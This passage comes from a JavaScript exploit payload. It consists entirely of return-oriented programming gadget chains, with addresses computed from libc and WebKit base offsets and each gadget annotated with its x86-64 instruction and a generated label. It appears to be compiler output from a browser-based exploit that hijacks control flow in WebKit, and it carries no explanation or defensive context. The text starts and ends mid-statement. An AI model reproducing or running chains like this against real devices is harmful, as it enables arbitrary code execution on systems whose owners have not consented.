set_gadget(libc_base+764760,); //pop rsi //L3343: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+200848, //L3346 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+200832, //L3344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3344: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3346: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+201040, //L3351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+201056, //L3352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+200992, //L3348 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+201024, //L3350 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3348: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3349: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3350: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3351: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3352: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+201168, //L3353+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+201160, //L3353 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3353: db([0, 0]); // 0x0 set_gadgets([ ropchain+201184, //L3353+24 ropchain+205424, //L3347 libc_base+764760, //pop rsi ropchain+201224, //L3354 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3354: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3356: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+201344, //L3359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+201328, //L3357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3357: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3359: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+201488, //L3362 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+201456, //L3360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+201472, //L3361 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3360: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3361: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3362: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+201568, //L3363 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3363: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3365: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+201688, //L3368 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+201672, //L3366 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3366: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3368: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+201832, //L3371 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+201800, //L3369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+201816, //L3370 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3369: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3370: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3371: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+201920, //L3373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3372: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3373: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+201976, //L3374 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3374: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3376: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+202056, //L3378 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3378: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+202168, //L3379 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3379: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3381: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+202288, //L3384 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+202272, //L3382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3382: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3384: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+202432, //L3387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+202400, //L3385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+202416, //L3386 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3385: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3386: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3387: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+202512, //L3388 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3388: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3390: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+202632, //L3393 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+202616, //L3391 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3391: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3393: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+202776, //L3396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+202744, //L3394 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+202760, //L3395 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3394: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3395: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3396: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+202848, //L3398 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3398: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+202904, //L3399 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3399: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+202984, //L3401 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3401: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3403: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+203104, //L3406 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+203088, //L3404 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3404: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3406: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+203264, //L3410 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+203216, //L3407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+203232, //L3408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3407: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3408: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3409: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L3410: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+203320, //L3411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3411: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3413: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+853989, //mov rax, rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+203448, //L3415 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3415: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+203504, //L3416 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3416: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+203648, //L3419 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+203664, //L3420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+203632, //L3418 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3418: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3419: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3420: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+203824, //L3424 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+203792, //L3422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+203808, //L3423 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3421: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3422: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3423: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3424: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+203880, //L3426 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3426: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+204008, //L3428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+204024, //L3429 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+203992, //L3427 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3427: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3428: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3429: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+204184, //L3433 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+204152, //L3431 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+204168, //L3432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3430: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3431: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3432: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3433: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+204240, //L3435 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3435: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+204368, //L3437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+204384, //L3438 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+204352, //L3436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3436: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3437: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3438: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+204544, //L3442 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+204512, //L3440 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+204528, //L3441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3439: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3440: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3441: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3442: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+204600, //L3444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3444: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+204728, //L3446 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+204744, //L3447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+204712, //L3445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3445: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3446: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3447: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+204824, //L3448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+204840, //L3449 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3448: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3449: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+204936, //L3451 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+204920, //L3450 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3450: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3451: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+205016, //L3452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3452: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3454: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+205136, //L3457 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+205120, //L3455 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3455: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3457: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+205216, //L3459 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+205248, //L3461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3459: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L3460: ropchain+205376, //L3458 libc_base+144605 //pop rdi ]); //L3461: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+205352, //L3463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+205368, //L3462 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3463: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3462: db([0, 0]); // 0x0 //L3458: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+205440, //L3464 //L3347: libc_base+782311, //pop rsp ropchain+205456, //L3465 //L3464: libc_base+782311, //pop rsp ropchain+200688, //L3340 //L3465: libc_base+764760, //pop rsi ropchain+205496, //L3466 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3466: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3468: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+205616, //L3471 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+205600, //L3469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3469: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3471: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+205792, //L3474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+205808, //L3475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+205760, //L3472 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+205776, //L3473 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3472: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3473: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3474: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3475: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+205904, //L3477 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+205888, //L3476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3476: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3477: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3478: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3479: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L3480: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+206104, //L3482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3482: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+206160, //L3483 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3483: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+206296, //L3487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+206280, //L3486 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3485: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3486: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3487: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+206432, //L3490 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+206464, //L3492 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+206416, //L3489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3489: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3490: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3491: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3492: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+206576, //L3493+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+206568, //L3493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3493: db([0, 0]); // 0x0 set_gadgets([ ropchain+206592, //L3493+24 ropchain+210392, //L3488 //L3494: libc_base+764760, //pop rsi ropchain+206632, //L3495 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3495: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3497: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+206752, //L3500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+206736, //L3498 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3498: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3500: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+206896, //L3503 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+206864, //L3501 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+206880, //L3502 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3501: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3502: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3503: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+206976, //L3504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 